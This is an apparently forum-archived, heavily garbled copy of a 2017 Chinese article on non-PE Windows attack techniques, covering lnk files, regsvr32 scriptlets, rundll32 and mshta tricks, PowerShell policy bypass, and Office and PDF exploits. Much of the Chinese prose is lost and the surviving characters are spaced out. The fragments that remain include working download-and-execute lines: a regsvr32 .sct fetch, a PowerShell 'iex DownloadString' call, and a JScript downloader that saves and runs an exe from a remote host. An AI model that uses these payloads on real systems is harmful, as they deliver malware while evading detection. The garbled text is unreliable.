[11689] 2017-08-21_浅谈非PE的攻击技巧

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2017-08-21_浅谈非PE的攻击技巧 P E   F r e e B u f   2 0 1 7 - 0 8 - 2 1 P E l n k l n k
l n k : : : l n k % t e m p % r a d 9 6 A 5 F . e x e r a d 9 6 A 5 F . e x e R E A D M E   C : W i n d o w s s y s t e m 3 2 m s h t a . e x e a b o u t : < s c r i p t   s r c = ' h x x p : / / n e y a - * * * . r u / c o n f i g . i n i ' > < / s c r i p t > h t t p s : / / m a i l . r u /   h x x p s : / / g o o g l e . c o m   /   h t t p s : / / y a n d e x . r u "
P E P E 1 . J S c r i p t V B S c r i p t P o w e r S h e l l J S c r i p t . j s V B S c r i p t V i s u a l   B a s i c . v b s P o w e r S h e l l C M D . p s 1 1 6 1 7   J S c r i p t V B S c r i p t 7 : 3 P o w e r S h e l l 2 . & 2 . 1   P E P E a :   b :   a j s v b s : 1 . j s j s e v b s v b e w s f 2 . w s c r i p t   / / e :   c s c r i p t   / / e :   b : 1 .
2 . 2 . 2   w s c r i p t c s c r i p t j s v b s 宿 2 . 2 . 1   r e g s v r 3 2 . e x e r e g s v r 3 2 s c t 2 . 2 . 2   r u n d l l 3 2 . e x e r u n d l l 3 2 . e x e D L L 使 : : r u n d l l 3 2 . e x e   ,   J S   r e g s v r 3 2   / u   / n ]   d l l n a m e   r e g s v r 3 2   / s   / n   / u   / i : h t t p : / / X X X / a . s c t   s c r o b j . d l l < ? X M L   v e r s i o n = " 1 . 0 " ? > < s c r i p t l e t > < r e g i s t r a t i o n   p r o g i d = " a "   c l a s s i d = " { 1 0 0 0 1 1 1 1 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 F E E D A C D C } " >   < s c r i p t l a n g u a g e = " J S c r i p t " >   < ! [ C D A T A [     n e w A c t i v e X O b j e c t ( " W S c r i p t . S h e l l " ) . R u n ( " c a l c " ) ;   ] ] > < / s c r i p t > < / r e g i s t r a t i o n > < / s c r i p t l e t > r u n d l l 3 2 . e x e j a v a s c r i p t : " . . m s h t m l , R u n H T M L A p p l i c a t i o n " ; n e w % 2 0 A c t i v e X O b j e c t ( " W S c r i p t . S h e l l " ) . R u n ( " c a l c " ) ; w i n d o w . c l o s e ( ) ;
2 . 2 . 3   m s h t a . e x e m s h t a . e x e . h t a 宿 j s : 2 . 2 . 4   G e t O b j e c t 2 0 1 7 B S i d e s C a s e y   S m i t h M a t t   N e l s o n G e t O b j e c t P u b P r n . v b s ( ) 2 . 2 . 5   P o w e r S h e l l   E x e c u t i o n   P o l i c y P o w e r S h e l l C M D : E x e c u t i o n   P o l i c y m s h t a . e x e " j a v a s c r i p t : n e w % 2 0 A c t i v e X O b j e c t ( " W S c r i p t . S h e l l " ) . R u n ( " c a l c " ) ; w i n d o w . c l o s e ( ) " C : W i n d o w s S y s t e m 3 2 P r i n t i n g _ A d m i n _ S c r i p t s z h - C N C : W i n d o w s S y s t e m 3 2 P r i n t i n g _ A d m i n _ S c r i p t s e n - U S c s c r i p t   / b C : W i n d o w s S y s t e m 3 2 P r i n t i n g _ A d m i n _ S c r i p t s z h - C N p u b p r n . v b s   t e s t " s c r i p t : h t t p : / / 1 9 2 . 1 6 8 . 1 6 3 . 1 / a a a . s c t " p o w e r s h e l l - n o p   - c   " i e x ( N e w - O b j e c t N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / x x x / t e s t . p s 1 ' ) "
: 1 2 2 . 3   2 0 1 6 j s 2 2 ( : ) 2 P E 2 P E : 3 . W i n 1 0   A M S I W i n 1 0 A M S I ( A n t i m a l w a r e   S c a n   I n t e r f a c e ) A M S I U R L I P w i n d o w s h o s t A M S I 1 . o f f i c e M i c r o s o f t O f f i c e   O f f i c e O f f i c e O f f i c e W o r d   便 0 x 1 使 使   p o w e r s h e l l   - n o p   - e x e c b y p a s s   . / r u n m e . p s 1 t y p e   . / r u n m e . p s 1   | P o w e r S h e l l . e x e   - n o p r o f i l e   - v a r   o S h e l l   =   n e w   A c t i v e X O b j e c t ( " W S c r i p t . S h e l l " ) ; v a r   a p p d i r   =   o S h e l l . E x p a n d E n v i r o n m e n t S t r i n g s ( " % t e m p % " ) +   " a b c . e x e " ; u r l   = " h t t p : / / a b . c d / e " ; v a r   x m l H T T P   =   n e w   A c t i v e X O b j e c t ( " M i c r o s o f t . X M L H T T P " ) ; x m l H T T P . o p e n ( " G e t " ,   u r l ,   f a l s e ) ; x m l H T T P . s e n d ( ) ; v a r   a s   =   n e w   A c t i v e X O b j e c t ( " A D O D B . S t r e a m " ) ; a s . T y p e   = 1 ; a s . O p e n ( ) ; a s . w r i t e ( x m l H T T P . r e s p o n s e B o d y ) ; a s . S a v e T o F i l e ( a p p d i r ,   2 ) ; a s . C l o s e ( ) ; o S h e l l . R u n ( a p p d i r )
w o r d 0 x 2 w o r d , 0 x 3 O f f i c e o f f i c e   C V E C V E - 2 0 1 7 - 0 1 9 9 C V E - 2 0 1 7 - 8 5 7 0   C V E - 2 0 1 5 - 1 6 4 1 C V E - 2 0 1 5 - 2 5 4 5 C V E - 2 0 1 2 - 0 1 5 8 2 0 1 7 3 C V E - 2 0 1 7 - 0 1 9 9 o f f i c e N o . 1 广 , W i n d o w s O f f i c e W i n d o w s   1 0 O f f i c e   2 0 1 6
C V E - 2 0 1 7 - 0 1 9 9   E X P U R L 2 . p d f P D F 便 P o r t a b l e   D o c u m e n t   F o r m a t A d o b e   S y s t e m s 1 9 9 3 P D F 广 A P T A d v a n c e d P e r s i s t e n t   T h r e a t P D F P D F 0 x 0 P D F d o c m P D F j a v a s c r i p t d o c m P D F w o r d d o c m d o c m
0 x 1 P D F o f f i c e   0 x 2 a d o b e   R e a d e r F o x i t p d f , p d f p a y l o a d
0 x 3 p d f 广 P D F 仿 A p p l e A p p l e   I D   A P P L E
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则